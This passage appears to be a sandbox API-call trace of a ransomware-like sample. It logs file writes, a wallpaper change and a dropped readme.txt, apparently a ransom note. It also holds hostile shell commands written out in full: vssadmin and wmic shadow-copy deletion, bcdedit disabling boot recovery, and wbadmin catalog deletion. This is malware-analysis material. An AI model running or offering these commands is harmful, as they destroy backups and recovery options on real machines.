ftLastAccessTime.dwLowDateTime=0x91ecf020, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x91ecf020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0107.030] FindClose (in: hFindFile=0xd8a790 | out: hFindFile=0xd8a790) returned 1 [0107.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0107.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0107.088] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0xd848c0 [0107.088] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0xd6ef60 [0108.698] LocalFree (hMem=0xd848c0) returned 0x0 [0108.698] LocalFree (hMem=0xd6ef60) returned 0x0 [0108.735] GetCurrentProcess () returned 0xffffffffffffffff [0108.735] GetCurrentProcess () returned 0xffffffffffffffff [0108.736] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x23edc0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x23edc0*=0x27c) returned 1 [0150.011] CloseHandle (hObject=0x27c) returned 1 [0150.044] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x45b020 [0150.044] LocalAlloc (uFlags=0x0, uBytes=0xd2) returned 0xd83440 [0150.141] LocalFree (hMem=0x45b020) returned 0x0 [0150.141] LocalFree (hMem=0xd83440) returned 0x0 [0150.141] GetCurrentProcess () returned 0xffffffffffffffff [0150.141] GetCurrentProcess () returned 0xffffffffffffffff [0150.142] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x23edc0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x23edc0*=0x1ac) returned 1 [0150.498] CloseHandle (hObject=0x1ac) returned 1 [0150.506] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x45b020 [0150.506] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0xe1b910 [0150.581] LocalFree (hMem=0x45b020) returned 0x0 [0150.581] LocalFree (hMem=0xe1b910) returned 0x0 [0150.582] GetCurrentProcess () returned 0xffffffffffffffff [0150.582] GetCurrentProcess () returned 0xffffffffffffffff [0150.582] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x23edc0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x23edc0*=0x390) returned 1 [0151.644] CloseHandle (hObject=0x390) returned 1 [0151.685] GetLogicalDrives () returned 0x4 [0151.686] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0151.710] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0151.710] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0151.710] CoTaskMemFree (pv=0xd85a10) [0151.711] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x23e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0151.712] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt", lpFilePart=0x0) returned 0x2d [0151.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec28) returned 1 [0151.712] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x390 [0151.713] GetFileType (hFile=0x390) returned 0x1 [0151.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb98) returned 1 [0151.713] GetFileType (hFile=0x390) returned 0x1 [0151.715] WriteFile (in: hFile=0x390, lpBuffer=0x249d378*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23ecc8, lpOverlapped=0x0 | out: lpBuffer=0x249d378*, lpNumberOfBytesWritten=0x23ecc8*=0x49d, lpOverlapped=0x0) returned 1 [0151.716] CloseHandle (hObject=0x390) returned 1 [0152.228] LocalAlloc (uFlags=0x0, uBytes=0x5c) returned 0xdebf30 [0152.540] LocalFree (hMem=0xdebf30) returned 0x0 [0152.576] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0152.576] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0xd85a10 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0152.576] CoTaskMemFree (pv=0xd85a10) [0152.579] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x23e940, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0152.580] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x23e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26 [0152.624] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\300wkaa5g.jpg", nBufferLength=0x105, lpBuffer=0x23e7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\300wkaa5g.jpg", lpFilePart=0x0) returned 0x33 [0152.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ece8) returned 1 [0152.625] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\300wkaa5g.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\300wkaa5g.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x364 [0152.627] GetFileType (hFile=0x364) returned 0x1 [0152.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ec58) returned 1 [0152.627] GetFileType (hFile=0x364) returned 0x1 [0152.628] WriteFile (in: hFile=0x364, lpBuffer=0x13d65158*, nNumberOfBytesToWrite=0xf2722, lpNumberOfBytesWritten=0x23edf8, lpOverlapped=0x0 | out: lpBuffer=0x13d65158*, lpNumberOfBytesWritten=0x23edf8*=0xf2722, lpOverlapped=0x0) returned 1 [0152.652] CloseHandle (hObject=0x364) returned 1 [0152.723] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\300wkaa5g.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\300wkaa5g.jpg"), fWinIni=0x3 | out: pvParam=0x249f684) returned 0 Thread: id = 12 os_tid = 0xee0 Thread: id = 13 os_tid = 0xee4 [0058.988] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 14 os_tid = 0xee8 Thread: id = 15 os_tid = 0xeec [0124.791] CoGetContextToken (in: pToken=0x1afffb30 | out: pToken=0x1afffb30) returned 0x0 [0124.793] CObjectContext::QueryInterface () returned 0x0 [0124.795] CObjectContext::GetCurrentThreadType () returned 0x0 [0124.796] Release () returned 0x0 Thread: id = 16 os_tid = 0xef0 [0062.150] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 17 os_tid = 0xef4 [0062.328] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 18 os_tid = 0xf34 Thread: id = 19 os_tid = 0xf38 Thread: id = 20 os_tid = 0xf80 [0107.096] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0107.113] ShellExecuteExW (in: pExecInfo=0x2498d60*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2498d60*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x38c)) returned 1 [0108.655] CoGetContextToken (in: pToken=0x1babf770 | out: pToken=0x1babf770) returned 0x0 [0108.656] CoUninitialize () Thread: id = 104 os_tid = 0xd00 [0150.064] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0150.067] ShellExecuteExW (in: pExecInfo=0x2499ac8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2499ac8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3c0)) returned 1 [0150.115] CoGetContextToken (in: pToken=0x1afdf350 | out: pToken=0x1afdf350) returned 0x0 [0150.115] CoUninitialize () Thread: id = 108 os_tid = 0xd6c [0150.517] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0150.518] ShellExecuteExW (in: pExecInfo=0x249a430*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C wbadmin delete catalog -quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x249a430*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C wbadmin delete catalog -quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3dc)) returned 1 [0150.560] CoGetContextToken (in: pToken=0x1ba9f1b0 | out: pToken=0x1ba9f1b0) returned 0x0 [0150.560] CoUninitialize () Thread: id = 149 os_tid = 0xa00 [0152.232] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0152.233] ShellExecuteExW (in: pExecInfo=0x249e6d0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x249e6d0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x444)) returned 1 [0152.494] CoGetContextToken (in: pToken=0x1ba5f710 | out: pToken=0x1ba5f710) returned 0x0 [0152.494] CoUninitialize () Thread: id = 150 os_tid = 0xa04 Thread: id = 152 os_tid = 0xa10 [0152.902] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0154.208] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc079 [0154.209] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1bd [0154.573] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe.config", nBufferLength=0x105, lpBuffer=0x1affe4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe.config", lpFilePart=0x0) returned 0x35 [0154.797] GetCurrentProcess () returned 0xffffffffffffffff [0154.798] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe7b8 | out: TokenHandle=0x1affe7b8*=0x42c) returned 1 [0154.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1affe1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0154.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1affe860 | out: lpFileInformation=0x1affe860*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f71f800, ftCreationTime.dwHighDateTime=0x1d4e4ec, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0x2f71f800, ftLastWriteTime.dwHighDateTime=0x1d4e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0154.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1affe1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0154.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1affe858 | out: lpFileInformation=0x1affe858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f71f800, ftCreationTime.dwHighDateTime=0x1d4e4ec, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0x2f71f800, ftLastWriteTime.dwHighDateTime=0x1d4e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0154.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1affe1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0154.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1affe6f8) returned 1 [0154.813] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x438 [0154.813] GetFileType (hFile=0x438) returned 0x1 [0154.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1affe668) returned 1 [0154.813] GetFileType (hFile=0x438) returned 0x1 [0154.851] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x1affe798 | out: lpFileSizeHigh=0x1affe798*=0x0) returned 0x8c8e [0154.851] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe708, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe708*=0x1000, lpOverlapped=0x0) returned 1 [0154.889] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe4d8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe4d8*=0x1000, lpOverlapped=0x0) returned 1 [0154.892] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe2a8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe2a8*=0x1000, lpOverlapped=0x0) returned 1 [0154.894] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe2a8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe2a8*=0x1000, lpOverlapped=0x0) returned 1 [0154.894] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe2a8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe2a8*=0x1000, lpOverlapped=0x0) returned 1 [0154.895] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe148, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe148*=0x1000, lpOverlapped=0x0) returned 1 [0154.907] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe388, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe388*=0x1000, lpOverlapped=0x0) returned 1 [0154.909] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe2b8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe2b8*=0x1000, lpOverlapped=0x0) returned 1 [0154.909] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe2b8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe2b8*=0xc8e, lpOverlapped=0x0) returned 1 [0154.910] ReadFile (in: hFile=0x438, lpBuffer=0x24a5de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1affe3c8, lpOverlapped=0x0 | out: lpBuffer=0x24a5de0*, lpNumberOfBytesRead=0x1affe3c8*=0x0, lpOverlapped=0x0) returned 1 [0154.910] CloseHandle (hObject=0x438) returned 1 [0154.911] CloseHandle (hObject=0x42c) returned 1 [0154.912] GetCurrentProcess () returned 0xffffffffffffffff [0154.912] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe978 | out: TokenHandle=0x1affe978*=0x42c) returned 1 [0154.913] CloseHandle (hObject=0x42c) returned 1 [0154.913] GetCurrentProcess () returned 0xffffffffffffffff [0154.913] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe978 | out: TokenHandle=0x1affe978*=0x42c) returned 1 [0154.914] CloseHandle (hObject=0x42c) returned 1 [0154.922] GetCurrentProcess () returned 0xffffffffffffffff [0154.923] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe7b8 | out: TokenHandle=0x1affe7b8*=0x42c) returned 1 [0154.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1affe860 | out: lpFileInformation=0x1affe860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.924] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe.config", nBufferLength=0x105, lpBuffer=0x1affe1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe.config", lpFilePart=0x0) returned 0x35 [0154.928] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1affe858 | out: lpFileInformation=0x1affe858*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.929] CloseHandle (hObject=0x42c) returned 1 [0154.929] GetCurrentProcess () returned 0xffffffffffffffff [0154.929] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe978 | out: TokenHandle=0x1affe978*=0x42c) returned 1 [0154.930] CloseHandle (hObject=0x42c) returned 1 [0154.932] GetCurrentProcess () returned 0xffffffffffffffff [0154.932] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe978 | out: TokenHandle=0x1affe978*=0x42c) returned 1 [0154.933] CloseHandle (hObject=0x42c) returned 1 [0154.953] GetCurrentProcess () returned 0xffffffffffffffff [0154.953] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe668 | out: TokenHandle=0x1affe668*=0x42c) returned 1 [0154.963] CloseHandle (hObject=0x42c) returned 1 [0154.964] GetCurrentProcess () returned 0xffffffffffffffff [0154.964] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1affe6a8 | out: TokenHandle=0x1affe6a8*=0x42c) returned 1 [0154.971] CloseHandle (hObject=0x42c) returned 1 [0155.006] GetSystemMetrics (nIndex=75) returned 1 [0155.070] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0155.146] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77710000 [0155.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x1affeb20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15 [0155.151] GetProcAddress (hModule=0x77710000, lpProcName="AddDllDirectory") returned 0x7fefd935478 [0155.151] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x7fef2c10000 [0155.177] AdjustWindowRectEx (in: lpRect=0x1affeec0, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50081 | out: lpRect=0x1affeec0) returned 1 [0155.186] GetCurrentProcess () returned 0xffffffffffffffff [0155.186] GetCurrentThread () returned 0xfffffffffffffffe [0155.186] GetCurrentProcess () returned 0xffffffffffffffff [0155.186] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1affecc0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1affecc0*=0x438) returned 1 [0155.194] GetCurrentThreadId () returned 0xa10 [0155.247] GetModuleHandleW (lpModuleName="user32.dll") returned 0x77610000 [0155.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x1affe8e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW", lpUsedDefaultChar=0x0) returned 14 [0155.247] GetProcAddress (hModule=0x77610000, lpProcName="DefWindowProcW") returned 0x7785b0ac [0155.249] GetStockObject (i=5) returned 0x1900015 [0155.256] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0155.259] CoTaskMemAlloc (cb=0x5c) returned 0xdec710 [0155.259] RegisterClassW (lpWndClass=0x1affe8a0) returned 0xc145 [0155.260] CoTaskMemFree (pv=0xdec710) [0155.261] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0155.261] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.2b7afa0_r12_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffffffffffd, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x302fe [0155.268] SetWindowLongPtrW (hWnd=0x302fe, nIndex=-4, dwNewLong=0x7785b0ac) returned 0x1ae3141c [0155.273] GetWindowLongPtrW (hWnd=0x302fe, nIndex=-4) returned 0x7785b0ac [0155.286] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x1affdcf8 | out: phkResult=0x1affdcf8*=0x440) returned 0x0 [0155.288] RegQueryValueExW (in: hKey=0x440, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x1affdd48, lpData=0x0, lpcbData=0x1affdd40*=0x0 | out: lpType=0x1affdd48*=0x0, lpData=0x0, lpcbData=0x1affdd40*=0x0) returned 0x2 [0155.289] RegQueryValueExW (in: hKey=0x440, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x1affdd48, lpData=0x0, lpcbData=0x1affdd40*=0x0 | out: lpType=0x1affdd48*=0x0, lpData=0x0, lpcbData=0x1affdd40*=0x0) returned 0x2 [0155.291] RegCloseKey (hKey=0x440) returned 0x0 [0155.293] SetWindowLongPtrW (hWnd=0x302fe, nIndex=-4, dwNewLong=0x1ae3146c) returned 0x7785b0ac [0155.293] GetWindowLongPtrW (hWnd=0x302fe, nIndex=-4) returned 0x1ae3146c [0155.293] GetWindowLongPtrW (hWnd=0x302fe, nIndex=-16) returned 0x6c10000 [0155.296] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc144 [0155.298] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x302fe, Msg=0x24, wParam=0x0, lParam=0x1affe320) returned 0x0 [0155.298] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1c1 [0155.298] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x302fe, Msg=0x81, wParam=0x0, lParam=0x1affe290) returned 0x1 [0155.299] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x302fe, Msg=0x83, wParam=0x0, lParam=0x1affe340) returned 0x0 [0155.299] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x302fe, Msg=0x1, wParam=0x0, lParam=0x1affe290) returned 0x0 [0155.299] GetClientRect (in: hWnd=0x302fe, lpRect=0x1affdd80 | out: lpRect=0x1affdd80) returned 1 [0155.299] GetWindowRect (in: hWnd=0x302fe, lpRect=0x1affdd80 | out: lpRect=0x1affdd80) returned 1 [0155.304] GetParent (hWnd=0x302fe) returned 0x0 [0155.310] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0155.310] CreateWindowExW (dwExStyle=0x50080, lpClassName="WindowsForms10.Window.8.app.0.2b7afa0_r12_ad1", lpWindowName=0x0, dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 